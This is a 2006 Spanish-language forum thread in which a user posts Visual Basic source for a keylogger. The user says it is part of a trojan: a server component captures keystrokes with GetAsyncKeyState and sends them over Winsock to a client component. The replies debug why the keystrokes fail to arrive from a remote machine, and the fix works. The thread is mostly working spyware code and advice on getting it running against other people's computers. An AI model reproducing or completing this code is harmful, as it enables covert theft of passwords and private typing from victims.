elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda con este codigo plis
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con este codigo plis  (Leído 1,334 veces)
Meg


Desconectado Desconectado

Mensajes: 462



Ver Perfil
Ayuda con este codigo plis
« en: 1 Octubre 2006, 17:27 pm »

Buenas foreros tengo un problemilla con este codigo es un keyloger,en realidad el keyloger va incorporado a un troyano y pongo aki solo el keyloger,bueno primero pongo el codigo y luego os digo lo k me pasa:

Servidor:
Código:
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Timer()
Dim pulsacion As String
For X% = 0 To 255 'para los 255 códigos ascii
If GetAsyncKeyState(X%) Then 'si se ha pulsado una tecla
pulsacion = ObtenerTecla(X%) 'obtener tecla pulsada, la funcion obtener tecla es una funcion aparte para obtener las teclas especiales
Text1.Text = Text1.Text & pulsacion  'añadir tecla a teclas pulsadas
Text1.Refresh
End If
Next
Call Command1_Click
If Not ws.State = sckConnected Then
Timer1.Enabled = False
End If
End Sub
Private Sub Form_Load()
Timer1.Enabled = False
end sub
Private Sub Command1_Click()
ws.SendData "log|" & Text1.Text
Text1.Text = ""
End Sub
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
If datos = "Keylogg" Then
Timer1.Enabled = True
End If

Cliente:

Código:
Dim log As Variant
Dim datos As String
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
ws.GetData datos
log = Split(datos, "|")
Select Case log(0)
Case "log"
Text1.Text = Text1.Text & log(1)
End Select
End Sub
Private Sub Command1_Click()
ws.SendData "Keylogg"
End Sub

si habeis leido el codigo el servidor manda "log|" & text1.text, y al llegar al cliente lo separa x el pipe con split pero el problema es k al llegar en el textbox donde deberia de llegar las teclas capturadas solo llega la palabra "log"(lo capturado no llega) en cambio para detectar la ventana activa utilizo el mismo codigo y funciona de maravilla.

Otra cosa curiosa es k utilizando ese codigo ejecutando el server en mi propia makina funciona bien me llegan las teclas capturadas y no aparece la palabra "log" pero cuando lo ejecuto el servidor en una makina remota las tecllas capturadas no llegan y solo pone "log" es como si el split lo separase mal

¿alguien sabe por k se produce esto y cual es la solucion?? :-\ :-\
Me stoy volviendo lokoo  :huh: :huh:


En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Ayuda con este codigo plis
« Respuesta #1 en: 1 Octubre 2006, 18:05 pm »

Hola:

Usa esto a ver si te funciona:

Código:
ws.GetData datos
if left(datos, 3)= "log" then
text1.text = mid (datos,4)
end if

Y el server q solo envie "log" & text1.text

Espero q te funcione
1S4ludo


En línea

WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Ayuda con este codigo plis
« Respuesta #2 en: 1 Octubre 2006, 18:12 pm »

va a dar erro de todos modos por por ejemplo:

yo envió un paquete así:

Ws.senddata "log|" & "Hola"

y rápidamente envio otro paquete

Ws.senddata "log|" & "Hola"

el paquete que se envía es  "log|Holalog|Hola" si usas un slipt al leerlo quedaría así:

Holalog.

lo que hay que hacer es que por ejemplo los log se manden cada 5 segundo o así.
En línea

Meg


Desconectado Desconectado

Mensajes: 462



Ver Perfil
Re: Ayuda con este codigo plis
« Respuesta #3 en: 1 Octubre 2006, 21:22 pm »

Tu code no me funciono EON ya me lo imaginaba de todas formas gracias,xk la soluccion es como decia warghost ya lo ize jejej muxas gracias tio  :)
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ayuda plis en este juego en c
Programación C/C++
chivis cristian 0 4,564 Último mensaje 15 Diciembre 2011, 04:54 am
por chivis cristian
Hashcat y 15 GPU
Hacking
elneors 7 3,641 Último mensaje 15 Octubre 2018, 19:04 pm
por warcry.
Error de novato Ayuda PLis
.NET (C#, VB.NET, ASP)
juanedwin 1 2,162 Último mensaje 2 Diciembre 2021, 14:43 pm
por juanedwin
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines